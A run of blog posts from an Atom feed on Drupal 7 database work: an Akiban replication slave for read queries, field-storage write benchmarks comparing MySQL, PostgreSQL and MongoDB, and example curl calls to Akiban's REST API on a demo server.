&lt;span class='go'&gt;sudo apt-key adv --keyserver keyserver.ubuntu.com --recv 0AA4244A&lt;/span&gt;
&lt;span class='go'&gt;sudo add-apt-repository &amp;quot;deb http://software.akiban.com/apt-developer/ lucid main&amp;quot;&lt;/span&gt;
&lt;span class='go'&gt;sudo apt-get update&lt;/span&gt;
&lt;span class='go'&gt;sudo apt-get install -y akiban-server akiban-adapter-mysql postgresql-client&lt;/span&gt;
&lt;span class='go'&gt;echo &amp;quot;INSTALL PLUGIN akibandb SONAME &amp;#39;libakibandb_engine.so&amp;#39;&amp;quot; | mysql -uroot&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Issuing the &lt;code&gt;SHOW PLUGINS&lt;/code&gt; command on this slave will now show the &lt;code&gt;AkibanDB&lt;/code&gt; storage engine. The next step is to import the &lt;code&gt;mysqldump&lt;/code&gt; file taken from the master and configure replication. On the slave server, you need to make sure &lt;code&gt;server-id&lt;/code&gt; is set in the &lt;code&gt;my.cnf&lt;/code&gt; file. Then, to enable replication, a &lt;code&gt;CHANGE MASTER&lt;/code&gt; command needs to be issued. An example of what that command might look like is:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;CHANGE MASTER TO&lt;/span&gt;
&lt;span class='go'&gt;  MASTER_HOST = &amp;#39;ec2-23-20-112-161.compute-1.amazonaws.com&amp;#39;,&lt;/span&gt;
&lt;span class='go'&gt;  MASTER_USER = &amp;#39;repl&amp;#39;,&lt;/span&gt;
&lt;span class='go'&gt;  MASTER_PASSWORD = &amp;#39;password&amp;#39;,&lt;/span&gt;
&lt;span class='go'&gt;  MASTER_LOG_FILE = &amp;#39;mysql-bin.000001&amp;#39;,&lt;/span&gt;
&lt;span class='go'&gt;  MASTER_LOG_POS = 403&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Finally, issuing &lt;code&gt;START SLAVE&lt;/code&gt; starts up replication. The observant among you will notice all tables are still InnoDB on the slave; we have done nothing to convert any tables to Akiban yet. Before we get to that, I want to configure Drupal running on the master server to know about the Akiban slave so it can send queries to it. First, we need to install the &lt;a href='http://drupal.org/sandbox/posulliv/1835778'&gt;Akiban database module&lt;/a&gt; in Drupal (the akiban directory should be copied to the appropriate location for your Drupal install) and the PHP client drivers for PostgreSQL:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;sudo apt-get install -y git php5-pgsql&lt;/span&gt;
&lt;span class='go'&gt;git clone http://git.drupal.org/sandbox/posulliv/1835778.git akiban&lt;/span&gt;
&lt;span class='go'&gt;cd akiban&lt;/span&gt;
&lt;span class='go'&gt;git checkout 7.x&lt;/span&gt;
&lt;span class='go'&gt;cd ../&lt;/span&gt;
&lt;span class='go'&gt;sudo cp -R akiban /var/www/drupal/includes/database/.&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now, the &lt;code&gt;settings.php&lt;/code&gt; file needs to be updated to know about this Akiban server:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='php'&gt;&lt;span class='x'&gt;$databases = array (&lt;/span&gt;
&lt;span class='x'&gt;  &amp;#39;default&amp;#39; =&amp;gt;&lt;/span&gt;
&lt;span class='x'&gt;  array (&lt;/span&gt;
&lt;span class='x'&gt;    &amp;#39;default&amp;#39; =&amp;gt;&lt;/span&gt;
&lt;span class='x'&gt;    array (&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;database&amp;#39; =&amp;gt; &amp;#39;drupal&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;username&amp;#39; =&amp;gt; &amp;#39;drupal&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;password&amp;#39; =&amp;gt; &amp;#39;drupal&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;host&amp;#39; =&amp;gt; &amp;#39;localhost&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;port&amp;#39; =&amp;gt; &amp;#39;&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;driver&amp;#39; =&amp;gt; &amp;#39;mysql&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;prefix&amp;#39; =&amp;gt; &amp;#39;&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;    ),&lt;/span&gt;
&lt;span class='x'&gt;    &amp;#39;slave&amp;#39; =&amp;gt;&lt;/span&gt;
&lt;span class='x'&gt;    array (&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;database&amp;#39; =&amp;gt; &amp;#39;drupal&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;username&amp;#39; =&amp;gt; &amp;#39;drupal&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;password&amp;#39; =&amp;gt; &amp;#39;drupal&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;host&amp;#39; =&amp;gt; &amp;#39;ec2-23-22-113-161.compute-1.amazonaws.com&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;port&amp;#39; =&amp;gt; &amp;#39;15432&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;driver&amp;#39; =&amp;gt; &amp;#39;akiban&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;prefix&amp;#39; =&amp;gt; &amp;#39;&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;    ),&lt;/span&gt;
&lt;span class='x'&gt;  ),&lt;/span&gt;
&lt;span class='x'&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;I would suggest enabling query logging on the Akiban server so you can see read queries being sent to the slave. Query logging can be enabled by modifying the &lt;code&gt;/etc/akiban/config/server.properties&lt;/code&gt; file to have these entries:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;akserver.querylog.enabled=true&lt;/span&gt;
&lt;span class='go'&gt;akserver.querylog.filename=/var/log/akiban/queries.log&lt;/span&gt;
&lt;span class='go'&gt;akserver.querylog.exec_time_threshold=0&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;All queries issued against Akiban will now be logged to the &lt;code&gt;/var/log/akiban/queries.log&lt;/code&gt; file since we set the query execution time threshold to 0. Akiban needs to be restarted for this to take effect.&lt;/p&gt;
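&lt;p&gt;Once Akiban is back up, watching queries arrive is as simple as tailing that file:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;tail -f /var/log/akiban/queries.log&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;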

&lt;p&gt;By default, very few queries from Drupal core are sent to a slave database. The search module is probably the best module to test with to see queries being sent to Akiban. The search module can be accessed from your Drupal site by going to &lt;code&gt;http://your.ip.address/drupal/?q=search&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;First, we need to convert the search-related tables to Akiban; otherwise, any search will fail since no tables have been converted yet. To convert these tables, we simply issue the following in MySQL:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='sql'&gt;&lt;span class='n'&gt;STOP&lt;/span&gt; &lt;span class='n'&gt;SLAVE&lt;/span&gt;&lt;span class='p'&gt;;&lt;/span&gt;
&lt;span class='k'&gt;ALTER&lt;/span&gt; &lt;span class='k'&gt;TABLE&lt;/span&gt; &lt;span class='n'&gt;search_total&lt;/span&gt; &lt;span class='n'&gt;ENGINE&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;&lt;span class='n'&gt;AkibanDB&lt;/span&gt;&lt;span class='p'&gt;;&lt;/span&gt;
&lt;span class='k'&gt;ALTER&lt;/span&gt; &lt;span class='k'&gt;TABLE&lt;/span&gt; &lt;span class='n'&gt;search_index&lt;/span&gt; &lt;span class='n'&gt;ENGINE&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;&lt;span class='n'&gt;AkibanDB&lt;/span&gt;&lt;span class='p'&gt;;&lt;/span&gt;
&lt;span class='k'&gt;ALTER&lt;/span&gt; &lt;span class='k'&gt;TABLE&lt;/span&gt; &lt;span class='n'&gt;node&lt;/span&gt; &lt;span class='n'&gt;ENGINE&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;&lt;span class='n'&gt;AkibanDB&lt;/span&gt;&lt;span class='p'&gt;;&lt;/span&gt;
&lt;span class='k'&gt;ALTER&lt;/span&gt; &lt;span class='k'&gt;TABLE&lt;/span&gt; &lt;span class='n'&gt;search_index&lt;/span&gt; &lt;span class='k'&gt;ADD&lt;/span&gt; &lt;span class='k'&gt;CONSTRAINT&lt;/span&gt; &lt;span class='o'&gt;`&lt;/span&gt;&lt;span class='n'&gt;__akiban_fk_00&lt;/span&gt;&lt;span class='o'&gt;`&lt;/span&gt; &lt;span class='k'&gt;FOREIGN&lt;/span&gt; &lt;span class='k'&gt;KEY&lt;/span&gt; &lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='n'&gt;sid&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt; &lt;span class='k'&gt;REFERENCES&lt;/span&gt; &lt;span class='n'&gt;node&lt;/span&gt; &lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='n'&gt;nid&lt;/span&gt;&lt;span class='p'&gt;);&lt;/span&gt;
&lt;span class='k'&gt;ANALYZE&lt;/span&gt; &lt;span class='k'&gt;TABLE&lt;/span&gt; &lt;span class='n'&gt;node&lt;/span&gt;&lt;span class='p'&gt;;&lt;/span&gt;
&lt;span class='k'&gt;ANALYZE&lt;/span&gt; &lt;span class='k'&gt;TABLE&lt;/span&gt; &lt;span class='n'&gt;search_index&lt;/span&gt;&lt;span class='p'&gt;;&lt;/span&gt;
&lt;span class='k'&gt;ANALYZE&lt;/span&gt; &lt;span class='k'&gt;TABLE&lt;/span&gt; &lt;span class='n'&gt;search_total&lt;/span&gt;&lt;span class='p'&gt;;&lt;/span&gt;
&lt;span class='k'&gt;START&lt;/span&gt; &lt;span class='n'&gt;SLAVE&lt;/span&gt;&lt;span class='p'&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The relevant tables are now converted to Akiban. Now, try searching content for a keyword. If everything is working correctly, queries should start appearing in the query log on the Akiban server when issuing content searches.&lt;/p&gt;

&lt;p&gt;This is obviously a pretty simple example, but it&amp;#8217;s now trivial to send more queries to Akiban. Just change the database target, convert the appropriate tables to Akiban on the slave, and away you go!&lt;/p&gt;
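&lt;p&gt;To expand on &amp;#8220;change the database target&amp;#8221;: in Drupal 7, a query opts in to the slave connection via the &lt;code&gt;target&lt;/code&gt; query option, so a module can push a heavy read to Akiban with something along these lines (the query here is just an illustrative placeholder):&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='php'&gt;&lt;span class='x'&gt;// Send this read to the &amp;#39;slave&amp;#39; target from settings.php (the Akiban&lt;/span&gt;
&lt;span class='x'&gt;// server in our case); Drupal falls back to &amp;#39;default&amp;#39; if no slave exists.&lt;/span&gt;
&lt;span class='x'&gt;$nids = db_query(&amp;#39;SELECT nid FROM {node} WHERE status = 1&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;  array(), array(&amp;#39;target&amp;#39; =&amp;gt; &amp;#39;slave&amp;#39;))-&amp;gt;fetchCol();&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;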

&lt;p&gt;If there is anything you would like more information on, please let me know in the comments or hit me up on &lt;a href='https://twitter.com/intent/user?screen_name=posulliv'&gt;twitter&lt;/a&gt; and I&amp;#8217;d be more than happy to dig in. We also have a &lt;a href='https://groups.google.com/a/akiban.com/d/forum/akiban-user'&gt;public mailing list&lt;/a&gt; for the Akiban project and I&amp;#8217;d encourage anyone who&amp;#8217;s interested to subscribe to that list and let us know how we&amp;#8217;re doing! Finally, I&amp;#8217;ll be presenting on this topic at &lt;a href='http://drupalcampma.com/how-solve-problem-drupal-queries-akiban'&gt;DrupalCamp MA&lt;/a&gt; on January 19th and I am also delivering a joint &lt;a href='http://www.akiban.com/webinars/how-to-ensure-sql-queries-don-t-slow-your-drupal-website#.UPA7B4njktg'&gt;webinar&lt;/a&gt; with Acquia in February.&lt;/p&gt;</content>
 </entry>
 
 <entry>
   <title>Testing an Alternate Field SQL Storage Module</title>
   <link href="http://posulliv.github.com/2013/01/08/norevisions-field"/>
   <updated>2013-01-08T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2013/01/08/norevisions-field</id>
   <content type="html">&lt;p&gt;After my &lt;a href='http://bit.ly/Wo9BeF'&gt;post yesterday&lt;/a&gt; testing the field storage layer, a commentator pointed out an alternate &lt;a href='http://drupal.org/project/field_sql_norevisions'&gt;SQL storage module&lt;/a&gt; that does not create a revision table for each field. Naturally, I had to try this out to see how what kind of performance was possible with this approach.&lt;/p&gt;

&lt;p&gt;The average throughput numbers I observed using this module are shown in the table below.&lt;/p&gt;
&lt;table border='1'&gt;
  &lt;tr&gt;
    &lt;th&gt;Environment&lt;/th&gt;
    &lt;th&gt;Average Throughput&lt;/th&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;Default MySQL&lt;/td&gt;
    &lt;td&gt;2892 nodes / minute&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;Default PostgreSQL&lt;/td&gt;
    &lt;td&gt;2313 nodes / minute&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;Tuned MySQL&lt;/td&gt;
    &lt;td&gt;4730 nodes / minute&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;Tuned PostgreSQL&lt;/td&gt;
    &lt;td&gt;2464 nodes / minute&lt;/td&gt;
  &lt;/tr&gt;
&lt;/table&gt;
&lt;p&gt;The image below shows the results graphically for the different environments I tested. The Y axis is throughput (nodes per minute) with the X axis specifying the CSV file (corresponding to an MLB year) being imported.&lt;/p&gt;
&lt;div&gt;
  &lt;img src='/images/field_norevision_throughput.png' alt='Throughput numbers.' /&gt;
&lt;/div&gt;&lt;br /&gt;
&lt;p&gt;That&amp;#8217;s a pretty big improvement over the numbers I got in my original test. We are still not reaching the roughly 8000 nodes per minute possible with a tuned MySQL instance and MongoDB for field storage, but at about 5000 nodes per minute we are getting somewhat close. It does raise the question: are the performance benefits of MongoDB for field storage worth it when we can get somewhat close using this module and a site&amp;#8217;s original database system?&lt;/p&gt;

&lt;p&gt;I would be interested in suggestions for read benchmarks from the community for different field storage backends so I can attempt to gain more insight into this question for myself.&lt;/p&gt;</content>
 </entry>
 
 <entry>
   <title>Field Storage Tests with Drupal 7</title>
   <link href="http://posulliv.github.com/2013/01/07/bench-field-storage"/>
   <updated>2013-01-07T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2013/01/07/bench-field-storage</id>
   <content type="html">&lt;p&gt;I had some spare time this weekend and decided to do some tests with the field storage layer. I really just wanted to re-produce the results Moshe Weitzman &lt;a href='http://cyrve.com/mongodb'&gt;published&lt;/a&gt; a while back. I also wanted to see what the best results I could get were.&lt;/p&gt;

&lt;h1 id='environment_details'&gt;Environment Details&lt;/h1&gt;

&lt;p&gt;The software and versions used for testing were:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;EC2 EBS backed Large instance (8GB of memory) in the US-EAST availability zone&lt;/li&gt;

&lt;li&gt;Ubuntu 12.04 (&lt;a href='https://console.aws.amazon.com/ec2/home?region=us-east-1#launchAmi=ami-fd20ad94'&gt;ami-fd20ad94&lt;/a&gt; as listed in &lt;a href='http://cloud-images.ubuntu.com/releases/precise/release/'&gt;official ubuntu AMI&amp;#8217;s&lt;/a&gt;)&lt;/li&gt;

&lt;li&gt;MySQL 5.5.28&lt;/li&gt;

&lt;li&gt;PostgreSQL 9.2&lt;/li&gt;

&lt;li&gt;MongoDB 2.0.4&lt;/li&gt;

&lt;li&gt;Drupal 7.17&lt;/li&gt;

&lt;li&gt;Drush 5.1&lt;/li&gt;

&lt;li&gt;Migrate 2.5&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;I ran tests against both MySQL and PostgreSQL with default settings, and I also ran tests where I modified the configuration of each system to be optimized for writes.&lt;/p&gt;

&lt;p&gt;The configuration options I specified for MySQL when tuning it were:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;innodb_flush_log_at_trx_commit=0&lt;/span&gt;
&lt;span class='go'&gt;innodb_doublewrite=0&lt;/span&gt;
&lt;span class='go'&gt;log-bin=0&lt;/span&gt;
&lt;span class='go'&gt;innodb_support_xa=0&lt;/span&gt;
&lt;span class='go'&gt;innodb_buffer_pool_size=6G&lt;/span&gt;
&lt;span class='go'&gt;innodb_log_file_size=512M&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The configuration options I specified for PostgreSQL when tuning it were:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;fsync = off&lt;/span&gt;
&lt;span class='go'&gt;synchronous_commit = off&lt;/span&gt;
&lt;span class='go'&gt;wal_writer_delay = 10000ms&lt;/span&gt;
&lt;span class='go'&gt;wal_buffers = 16MB&lt;/span&gt;
&lt;span class='go'&gt;checkpoint_segments = 64&lt;/span&gt;
&lt;span class='go'&gt;shared_buffers = 6GB&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h1 id='dataset'&gt;Dataset&lt;/h1&gt;

&lt;p&gt;The dataset used for the tests comes from the &lt;a href='http://drupalcode.org/project/migrate.git/tree/refs/heads/7.x-2.x:/migrate_example_baseball'&gt;migrate_example_baseball&lt;/a&gt; module that ships as part of the migrate module. This dataset contains a box score from every Major League Baseball game from the year 2000 to the year 2009. Each year&amp;#8217;s data is contained in a CSV file. Different components of the box score are saved in fields, hence stressing field storage heavily.&lt;/p&gt;
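&lt;p&gt;For anyone reproducing this, the imports can be driven with the migrate module&amp;#8217;s drush commands (migrate 2.x syntax; &lt;code&gt;drush migrate-status&lt;/code&gt; lists the per-year migrations the module registers):&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;drush en -y migrate migrate_example_baseball&lt;/span&gt;
&lt;span class='go'&gt;drush migrate-status&lt;/span&gt;
&lt;span class='go'&gt;drush migrate-import --all&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;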

&lt;h1 id='results'&gt;Results&lt;/h1&gt;

&lt;p&gt;Average throughput numbers for the various configurations I tested are shown in the table below.&lt;/p&gt;
&lt;table border='1'&gt;
  &lt;tr&gt;
    &lt;th&gt;Environment&lt;/th&gt;
    &lt;th&gt;Average Throughput&lt;/th&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;Default MySQL&lt;/td&gt;
    &lt;td&gt;1932 nodes / minute&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;Default PostgreSQL&lt;/td&gt;
    &lt;td&gt;1649 nodes / minute&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;Tuned MySQL&lt;/td&gt;
    &lt;td&gt;3024 nodes / minute&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;Tuned PostgreSQL&lt;/td&gt;
    &lt;td&gt;1772 nodes / minute&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;Default MySQL with MongoDB&lt;/td&gt;
    &lt;td&gt;4609 nodes / minute&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;Default PostgreSQL with MongoDB&lt;/td&gt;
    &lt;td&gt;4810 nodes / minute&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;Tuned MySQL with MongoDB&lt;/td&gt;
    &lt;td&gt;7671 nodes / minute&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;Tuned PostgreSQL with MongoDB&lt;/td&gt;
    &lt;td&gt;5911 nodes / minute&lt;/td&gt;
  &lt;/tr&gt;
&lt;/table&gt;
&lt;p&gt;The image below shows the results graphically for the different environments I tested. The Y axis is throughput (nodes per minute) with the X axis specifying the CSV file (corresponding to an MLB year) being imported.&lt;/p&gt;
&lt;div&gt;
  &lt;img src='/images/node_thruput.png' alt='Throughput numbers.' /&gt;
&lt;/div&gt;&lt;br /&gt;
&lt;h1 id='conclusion'&gt;Conclusion&lt;/h1&gt;

&lt;p&gt;It&amp;#8217;s pretty obvious from glancing at the results above that using MongoDB for field storage results in the best throughput. Tuned MySQL using MongoDB for field storage gave me the best results. This is consistent with what Moshe reported in his original article as well.&lt;/p&gt;

&lt;p&gt;What was very interesting to me were the PostgreSQL numbers. The overhead of having a table per field with the default SQL field storage seems to be very high with PostgreSQL. It&amp;#8217;s interesting to see how much better an optimized PostgreSQL does when using MongoDB for field storage.&lt;/p&gt;

&lt;p&gt;After performing these tests, one experiment I really want to try now is to create a field storage module for PostgreSQL that uses the &lt;a href='http://wiki.postgresql.org/wiki/What%27s_new_in_PostgreSQL_9.2#JSON_datatype'&gt;JSON data type&lt;/a&gt; included in the 9.2 release. Hopefully, I will get some spare time in the coming week or two to work on that.&lt;/p&gt;
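&lt;p&gt;As a rough sketch of the idea (a hypothetical schema, not an existing module): instead of one table per field, each entity&amp;#8217;s field values could live in a single row as a JSON document. Note that 9.2 mostly buys native storage and validation of JSON; the richer JSON operators only arrived in 9.3.&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='go'&gt;CREATE TABLE field_data_json (&lt;/span&gt;
&lt;span class='go'&gt;  entity_type varchar(128) NOT NULL,&lt;/span&gt;
&lt;span class='go'&gt;  entity_id   bigint       NOT NULL,&lt;/span&gt;
&lt;span class='go'&gt;  fields      json         NOT NULL,&lt;/span&gt;
&lt;span class='go'&gt;  PRIMARY KEY (entity_type, entity_id)&lt;/span&gt;
&lt;span class='go'&gt;);&lt;/span&gt;
&lt;span class='go'&gt;INSERT INTO field_data_json&lt;/span&gt;
&lt;span class='go'&gt;  VALUES (&amp;#39;node&amp;#39;, 1, &amp;#39;{&amp;quot;field_home_runs&amp;quot;: [{&amp;quot;value&amp;quot;: 3}]}&amp;#39;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</content>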
 </entry>
 
 <entry>
   <title>Making Drupal more RESTful with Akiban</title>
   <link href="http://posulliv.github.com/2012/12/17/aiban-rest-access"/>
   <updated>2012-12-17T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2012/12/17/aiban-rest-access</id>
   <content type="html">&lt;p&gt;&lt;a href='http://posulliv.github.com/planet%20drupal/2012/12/14/drupal-7-install-akiban/'&gt;Last week&lt;/a&gt;, I published an article on how to install Drupal 7 with Akiban as the backend database. Today, I wanted to briefly show off our REST API using the schema that is created with a standard install of Drupal 7 core.&lt;/p&gt;

&lt;p&gt;First, I installed the &lt;a href='http://drupal.org/project/devel'&gt;devel&lt;/a&gt; module and generated some data, since a bare-bones install with no data would not be much fun. This server is running on a publicly available EC2 instance too, so if you are interested in trying these examples out yourself at home, feel free to do so! I&amp;#8217;ll leave the EC2 instance up and running for the remainder of 2012, but if anyone wants to try the examples out and the instance seems unavailable, please let me know and I&amp;#8217;ll fire it up again for you.&lt;/p&gt;

&lt;p&gt;For the first few examples, I&amp;#8217;m going to use &lt;code&gt;curl&lt;/code&gt; since it&amp;#8217;s available on nearly every system (including OS X). Let&amp;#8217;s first get the version of the Akiban server we are going to be interacting with:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='gp'&gt;$&lt;/span&gt; curl -X GET -H &lt;span class='s2'&gt;&amp;quot;Content-Type: application/json&amp;quot;&lt;/span&gt; http://ec2-50-19-28-27.compute-1.amazonaws.com:8091/api/version
&lt;span class='go'&gt;[&lt;/span&gt;
&lt;span class='go'&gt;{&amp;quot;server_name&amp;quot;:&amp;quot;Akiban Server&amp;quot;,&amp;quot;server_version&amp;quot;:&amp;quot;1.4.4.2451&amp;quot;}&lt;/span&gt;
&lt;span class='go'&gt;]&lt;/span&gt;
&lt;span class='gp'&gt;$&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Let&amp;#8217;s continue with a few simple examples to get started. Next, I want to know the list of schemas on the server I am interacting with:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='gp'&gt;$&lt;/span&gt; curl -X GET -H &lt;span class='s2'&gt;&amp;quot;Content-Type: application/json&amp;quot;&lt;/span&gt; http://ec2-50-19-28-27.compute-1.amazonaws.com:8091/api/information_schema.schemata
&lt;span class='go'&gt;[&lt;/span&gt;
&lt;span class='go'&gt;{&amp;quot;schema_name&amp;quot;:&amp;quot;drupal&amp;quot;,&amp;quot;schema_owner&amp;quot;:null,&amp;quot;default_character_set_name&amp;quot;:null,&amp;quot;default_collation_name&amp;quot;:null},&lt;/span&gt;
&lt;span class='go'&gt;{&amp;quot;schema_name&amp;quot;:&amp;quot;information_schema&amp;quot;,&amp;quot;schema_owner&amp;quot;:null,&amp;quot;default_character_set_name&amp;quot;:null,&amp;quot;default_collation_name&amp;quot;:null},&lt;/span&gt;
&lt;span class='go'&gt;{&amp;quot;schema_name&amp;quot;:&amp;quot;sqlj&amp;quot;,&amp;quot;schema_owner&amp;quot;:null,&amp;quot;default_character_set_name&amp;quot;:null,&amp;quot;default_collation_name&amp;quot;:null},&lt;/span&gt;
&lt;span class='go'&gt;{&amp;quot;schema_name&amp;quot;:&amp;quot;sys&amp;quot;,&amp;quot;schema_owner&amp;quot;:null,&amp;quot;default_character_set_name&amp;quot;:null,&amp;quot;default_collation_name&amp;quot;:null},&lt;/span&gt;
&lt;span class='go'&gt;{&amp;quot;schema_name&amp;quot;:&amp;quot;test&amp;quot;,&amp;quot;schema_owner&amp;quot;:null,&amp;quot;default_character_set_name&amp;quot;:null,&amp;quot;default_collation_name&amp;quot;:null}&lt;/span&gt;
&lt;span class='go'&gt;]&lt;/span&gt;
&lt;span class='gp'&gt;$&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Let&amp;#8217;s try a Drupal-specific example next. Our REST API allows you to retrieve an entire table group in one request. So let&amp;#8217;s say I wanted to get all information for a certain user (I pretty-printed the JSON in the output below, so if you run this yourself you will need to format the output):&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='console'&gt;&lt;span class='gp'&gt;$&lt;/span&gt; curl -X GET -H &lt;span class='s2'&gt;&amp;quot;Content-Type: application/json&amp;quot;&lt;/span&gt; http://ec2-50-19-28-27.compute-1.amazonaws.com:8091/api/drupal.users/1
&lt;span class='go'&gt;[&lt;/span&gt;
&lt;span class='go'&gt;    {&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;uid&amp;quot;: 1,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;name&amp;quot;: &amp;quot;posulliv&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;pass&amp;quot;: &amp;quot;$S$DPV31LZyFWJmJ.Fcj6IRyjb/RFMyQQtE87gsad7cavgnH3fw0GHA&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;mail&amp;quot;: &amp;quot;posullivan@akiban.com&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;theme&amp;quot;: &amp;quot;&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;signature&amp;quot;: &amp;quot;&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;signature_format&amp;quot;: null,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;created&amp;quot;: 1355345142,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;access&amp;quot;: 1355762571,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;login&amp;quot;: 1355345211,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;status&amp;quot;: 1,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;timezone&amp;quot;: &amp;quot;America/New_York&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;language&amp;quot;: &amp;quot;&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;picture&amp;quot;: 0,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;init&amp;quot;: &amp;quot;posullivan@akiban.com&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;data&amp;quot;: &amp;quot;YjowOw==&amp;quot;,&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;drupal.authmap&amp;quot;: [],&lt;/span&gt;
&lt;span class='go'&gt;        &amp;quot;drupal.sessions&amp;quot;: [&lt;/span&gt;
&lt;span class='go'&gt;            {&lt;/span&gt;
&lt;span class='go'&gt;                &amp;quot;uid&amp;quot;: 1,&lt;/span&gt;
